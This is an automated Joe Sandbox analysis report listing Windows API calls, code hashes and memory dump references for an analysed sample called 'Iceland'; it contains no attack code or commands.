                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32ad3eb2f7c974ce77b06cfadb4d27e7ba678de22ac249f8e5a313b377be5939
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A811E63A200342ABCB15BF78D845E7A77E9FF85750B50412AF946CB261FF359812D790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 00AB615A
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB616C
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB6177
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AB62B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 455545452-0
                                                                                                                                                                                                                                                                • Opcode ID: 8f0964d5ca56cb1677d8570643a57af324b045346a3a405d5921d33f9d262502
                                                                                                                                                                                                                                                                • Instruction ID: a1afd6e26a8d19d1b3006fbea2f92d6393ca99940ba4180ec1a089cb0af363ce
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f0964d5ca56cb1677d8570643a57af324b045346a3a405d5921d33f9d262502
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B118175900218A6DB10DFA5DC84BFEBBBCFB55354F14412AFA15D6083EB78C941CBA0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a409d58f3119173cde42ad11d3f3f08053a4c1ab9c69903b469af711696976e7
                                                                                                                                                                                                                                                                • Instruction ID: 4944030a0f866f656f437242d601270111086e6fbd2e4dbcd0c07e9fb2add872
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a409d58f3119173cde42ad11d3f3f08053a4c1ab9c69903b469af711696976e7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45018FB22062167EF62126B87CC0F27671DFF523BAB300725BD21A11E1EA708C89C260
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00A82394
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A823A6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A823BC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A823D7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 9ab9b2b6b1315da3fa739ae23e26b6988ca885891d6d5b0aa6be9b1f738339a7
                                                                                                                                                                                                                                                                • Instruction ID: 208f068dc87bc54b1a83084806e1225e98acdd249ac08d99cc9718cf8d586875
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ab9b2b6b1315da3fa739ae23e26b6988ca885891d6d5b0aa6be9b1f738339a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6110C7A900218FFEB11EB95CD85FADBB78FB08750F200091E601B7290D6716E51DB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A21AF4
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00A631F9
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00A63203
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A6320E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ae6bc21ce829566b3655a67ba0244541dca536a06db7801c9d4365ee31df6f2
                                                                                                                                                                                                                                                                • Instruction ID: 5dcf7f8d565b1d3c7029a94bcd517445ac6f09e3c966bf31e11496c9fcb65d1e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ae6bc21ce829566b3655a67ba0244541dca536a06db7801c9d4365ee31df6f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5113D32901029ABDF10DF98D9469EE77B8FB05380F100566F902E3151D771BA52CBA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A8EB14
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00A8EB47
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A8EB5D
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A8EB64
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                • Opcode ID: 71d0e35fa91f3652db3d8267428d36f574deeae9a4cc429084f2529803910060
                                                                                                                                                                                                                                                                • Instruction ID: d061d7592aa8129c6a6316816a6b8a4e770371c27585a9710241fddac38d57c6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71d0e35fa91f3652db3d8267428d36f574deeae9a4cc429084f2529803910060
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB1126B6904218FBC701EBE89C09A9F7FADEB45320F008316F815E72A1E674CD0587A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,00A4D369,00000000,00000004,00000000), ref: 00A4D588
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A4D594
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A4D59B
                                                                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 00A4D5B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 173952441-0
                                                                                                                                                                                                                                                                • Opcode ID: 419ecb633310b528c4a41535922038e8a4288cb6bed9205e9c1444487b645e6c
                                                                                                                                                                                                                                                                • Instruction ID: deb8960e3efc16c376b9e09158b72b241ad5c319eab069f9e49c7c9ebf5688a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 419ecb633310b528c4a41535922038e8a4288cb6bed9205e9c1444487b645e6c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701F93A4001147BCB106FA5EC09BAE7B68EFC1335F100319F9258A1E0DF708801C6A2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A278B1
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A278C5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A278CF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                • Opcode ID: db9d5f69d463cd60e0c7eb30d627fb67b3bd40c543aa32b39df053017db94632
                                                                                                                                                                                                                                                                • Instruction ID: 13e6894caa6ea74df6d1a1ac546813c2ffe3770180c0384f5f77e7352d07d328
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db9d5f69d463cd60e0c7eb30d627fb67b3bd40c543aa32b39df053017db94632
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4611AD72505119BFDF169F98EC58EEA7B69FF08364F040225FA0052120D731DDA0EBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00A5338D,00000364,00000000,00000000,00000000,?,00A535FE,00000006,FlsSetValue), ref: 00A53418
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00A5338D,00000364,00000000,00000000,00000000,?,00A535FE,00000006,FlsSetValue,00AC3260,FlsSetValue,00000000,00000364,?,00A531B9), ref: 00A53424
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A5338D,00000364,00000000,00000000,00000000,?,00A535FE,00000006,FlsSetValue,00AC3260,FlsSetValue,00000000), ref: 00A53432
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                • Opcode ID: ea25d829b3a5158b84ec59ec76c5525218dd5173b1e40775499eaaed2fe5a772
                                                                                                                                                                                                                                                                • Instruction ID: 280df241de13ed3fa706c1ac4c8b3efee0a4cd462e1068f07d9826f3b0c1eb98
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea25d829b3a5158b84ec59ec76c5525218dd5173b1e40775499eaaed2fe5a772
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4018833612222ABCF228BB9AC449567BB8BF95BE37214720FD06D7151D731DD06C6E0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BA8B
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BAB0
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BABA
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A8B69A,?,00008000), ref: 00A8BAED
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AB888E
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AB88A6
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AB88CA
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AB88E5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 357397906-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A83712
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A83723
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A8372A
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A83731
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A21F87
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21F96
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: BeginPath.GDI32(?), ref: 00A21FAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21FD6
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AB92E3
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00AB92F0
                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00AB9300
                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00AB930E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 00A221BC
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00A221C6
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00A221D9
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 00A221E1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00A7EC36
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00A7EC40
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A7EC60
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?), ref: 00A7EC81
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00A7EC4A
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00A7EC54
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A7EC60
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?), ref: 00A7EC81
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A95919
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                • String ID: *$LPT
                                                                                                                                                                                                                                                                • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00A4E67D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                • String ID: pow
                                                                                                                                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00A3F6DB
